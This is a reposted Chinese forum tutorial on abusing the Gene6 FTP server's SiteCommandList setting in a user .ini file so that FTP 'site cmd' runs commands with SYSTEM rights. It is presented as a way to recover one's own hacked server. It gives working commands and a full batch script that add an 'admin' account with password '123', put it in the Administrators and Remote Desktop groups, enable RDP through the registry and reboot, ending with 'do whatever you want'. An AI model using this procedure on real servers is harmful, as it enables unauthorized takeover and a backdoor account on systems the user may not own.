【转贴】如何使用Gene6取得管理员权限！

[Tony]

如果你的服务器被黑无法登录，但是你使用Gene6开了ftp服务，并且该ftp目前可以访问，同时你的ftp能访问gen6安装目录。那么恭喜你，你可以取得这台计算机完全权限了。

到Gene6安装目录，里面有个文件夹<Accounts>，找到你要修改的域比如<DRL>，进入<Uers>，下面看到ftp登录用户名username.ini了，找到你要用的帐户，比如drl.ini，
下面我们开始手术

编辑配置文件

在最下面添加
SiteCommandList0=-1,cmd,net user xx /add,0,60,-1,-1,

下面简单说明一下
SiteCommandList 配置文件，支持site [args]命令后面添加0 1 2 3以区别各条不同的命令。
= 不要多说
-1一些选项是否之类的。不需要关心。
cmd就是命令，执行时输入site cmd即可。
net user xx /add就是你要执行的命令，因为Gene6运行在SYSTEM用户权限下，具有系统的完全控制权限。

0就是是否将输出改向到你的客户端。
60就是超时60秒。

好了上面的命令介绍完了就知道怎么做了。

输入一系列命令
net user 看看有哪些用户。
net user password 修改密码。

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server /v DenyTSConnections /t reg_dword /d 0 /f
然后shutdown -r -t 0重启计算机。



我写了个批处理脚本

代码:

@echo off
echo "正在添加用户。用户名admin ，密码123"
net user admin 123 /add
net localgroup Administrators admin /add
net localgroup Remote Desktop Users admin /add
echo "准备添加注册表"
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /f /v fDenyTSConnections /t REG_DWORD /d 0
shutdown -r -t 0
@echo on

将这个写到记事本，然后保存为xx.cmd，保存在ftp的C:\WIndows下。
命令就这样写
SiteCommandList0=-1,cmd,xx.cmd,0,60,-1,-1,

登录ftp执行site cmd
随后计算机就能重启，可以用admin 密码123登录远程桌面，想干嘛就干嘛哦